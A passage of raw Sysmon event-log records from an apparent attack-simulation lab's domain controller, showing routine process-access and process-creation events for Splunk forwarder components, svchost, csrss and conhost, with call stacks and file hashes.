Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4318-6000-9E00-000000009A01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4318-6000-9E00-000000009A01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.612{08A6967A-4319-6000-9F00-000000009A01}45604636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4319-6000-9F00-000000009A01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4319-6000-9F00-000000009A01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4319-6000-9F00-000000009A01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:53.456{08A6967A-4319-6000-9F00-000000009A01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-431A-6000-A000-000000009A01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 